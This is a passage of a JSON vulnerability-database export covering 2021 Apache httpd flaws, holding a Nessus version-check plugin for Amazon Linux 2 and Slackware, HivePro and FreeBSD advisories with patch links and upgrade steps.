"p-cpe:/a:amazon:linux:mod_md", "p-cpe:/a:amazon:linux:mod_proxy_html", "p-cpe:/a:amazon:linux:mod_session", "p-cpe:/a:amazon:linux:mod_ssl", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1716.NASL", "href": "https://www.tenable.com/plugins/nessus/154179", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1716.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154179);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2021-33193\",\n \"CVE-2021-34798\",\n \"CVE-2021-36160\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41524\",\n \"CVE-2021-41773\",\n \"CVE-2021-42013\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0440-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"ALAS\", value:\"2021-1716\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Amazon Linux 2 : httpd (ALAS-2021-1716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of httpd installed on the remote host is prior to 2.4.51-1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the ALAS2-2021-1716 advisory.\n\n - A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead\n to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.\n (CVE-2021-33193)\n\n - Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP\n Server 2.4.48 and earlier. (CVE-2021-34798)\n\n - A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and\n crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1716.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-33193\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-34798\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-36160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-39275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-40438\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41524\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-41773\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-42013\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update httpd' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42013\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache 2.4.50 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_md\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-debuginfo-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-devel-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-filesystem-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-manual-2.4.51-1.amzn2', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'httpd-tools-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ldap-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_md-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_proxy_html-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_session-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'mod_ssl-2.4.51-1.amzn2', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / etc\");\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:58:52", "description": "The instance of Apache HTTP Server running on the remote host is affected by a path traversal vulnerability. A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T00:00:00", "type": "nessus", "title": "Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/155600", "sourceData": "Binary data apache_2_4_50_path_traversal.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2021-11-26T18:49:38", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.50-i586-1_slack14.2.txz: Upgraded.\n This release contains security fixes and improvements.\n Fixed null pointer dereference in h2 fuzzing.\n Fixed path traversal and file disclosure vulnerability.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.50-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.50-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.50-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.50-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.50-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.50-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.50-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.50-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n758dffc23a1504de73404a3722b5c678 httpd-2.4.50-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n141276e5534ba71d78c95773ea6ee115 httpd-2.4.50-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9783dbf60532959fa59c5ea5a39de12f httpd-2.4.50-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ncf6e8c46653385296e4f5d2f98c13369 httpd-2.4.50-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n53b8fec2d3b536bb35dbbd96cfc16ed6 httpd-2.4.50-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\nc10d440eee460e784aa9023e8ed05f02 httpd-2.4.50-x86_64-1_slack14.2.txz\n\nSlackware -current package:\neeaa1bd4a7980f998a4d15a86803a4e0 n/httpd-2.4.50-i586-1.txz\n\nSlackware x86_64 -current package:\n1f7c8675b37517c68d2f77695932e510 n/httpd-2.4.50-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.50-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-06T01:14:05", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T01:14:05", "id": "SSA-2021-278-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.434604", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-26T18:49:38", "description": "New httpd packages are available for Slackware 14.0, 14.1, 14.2, and -current\nto fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.51-i586-1_slack14.2.txz: Upgraded.\n SECURITY: CVE-2021-42013: Path Traversal and Remote Code\n Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete\n fix of CVE-2021-41773) (cve.mitre.org)\n It was found that the fix for CVE-2021-41773 in Apache HTTP\n Server 2.4.50 was insufficient. An attacker could use a path\n traversal attack to map URLs to files outside the directories\n configured by Alias-like directives.\n If files outside of these directories are not protected by the\n usual default configuration \"require all denied\", these requests\n can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution.\n This issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n earlier versions.\n Credits: Reported by Juan Escobar from Dreamlab Technologies,\n Fernando MuA+-oz from NULL Life CTF Team, and Shungo Kumasaka\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.51-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.51-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.51-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.51-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.51-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.51-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.51-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.51-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\n3dc9af339945226035885f4896e7c443 httpd-2.4.51-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n621539c82e9f23a2b63ec4ad4fe60fa1 httpd-2.4.51-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nb05881b3d8d5ce4edc267c1ab6f70be1 httpd-2.4.51-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n7be7108c6acbf118df01c06632242607 httpd-2.4.51-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nd1d85a41387af3f18b777d000a023288 httpd-2.4.51-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n7909fd6353790b8cb3dd2d083ea7d6f3 httpd-2.4.51-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n169e11d499afa90780a1d8d9c23a5a94 n/httpd-2.4.51-i586-1.txz\n\nSlackware x86_64 -current package:\nc761e7d4fbc8198a21025b804a962874 n/httpd-2.4.51-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.51-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-08T03:27:06", "type": "slackware", "title": "[slackware-security] httpd", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T03:27:06", "id": "SSA-2021-280-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.483439", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-10-13T11:19:35", "description": "#### THREAT LEVEL: Amber.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/10/Multiple-vulnerabilities-have-been-discovered-in-the-Apache-HTTP-Server_TA202140.pdf>)[](<Https://www.hivepro.com/wp-content/uploads/2021/10/Multiple-vulnerabilities-have-been-discovered-in-the-Apache-HTTP-Server_TA202140.pdf>)\n\nThere is a zero-day vulnerability (CVE-2021-41773) and a DoS vulnerability (CVE-2021-41524) in Apache HTTP servers. After a publicly disclosed exploit, the zero-day vulnerability has been actively exploited in the wild. The Hive Pro Threat research team recommends that you address these vulnerabilities as soon as possible.\n\n#### Vulnerability Details\n\n\n\n#### Patch Link\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n#### References\n\n<https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/>", "cvss3": {}, "published": "2021-10-06T08:57:02", "type": "hivepro", "title": "Multiple vulnerabilities have been discovered in the Apache HTTP Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T08:57:02", "id": "HIVEPRO:7FC9DCD27C78F4BFA53C84B6CB04EC19", "href": "https://www.hivepro.com/multiple-vulnerabilities-have-been-discovered-in-apache-http-server/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\n\nmoderate: null pointer dereference in h2 fuzzing\n\t (CVE-2021-41524)\nimportant: Path traversal and file disclosure vulnerability in\n\t Apache HTTP Server 2.4.49 (CVE-2021-41773)\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "freebsd", "title": "Apache httpd -- Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2021-10-06T00:00:00", "id": "25B78BDD-25B8-11EC-A341-D4C9EF517024", "href": "https://vuxml.freebsd.org/freebsd/25b78bdd-25b8-11ec-a341-d4c9ef517024.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-01-19T15:51:30", "description": "\n\nThe Apache http server project reports:\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\n\t Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n\t (CVE-2021-42013).\nIt was found that the fix for CVE-2021-41773 in Apache HTTP\n\t Server 2.4.50 was insufficient. An attacker could use a path\n\t traversal attack to map URLs to files outside the directories\n\t configured by Alias-like directives.\nIf files outside of these directories are not protected by the\n\t usual default configuration \"require all denied\", these requests\n\t can succeed. If CGI scripts are also enabled for these aliased\n\t pathes, this could allow for remote code execution.\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not\n\t earlier 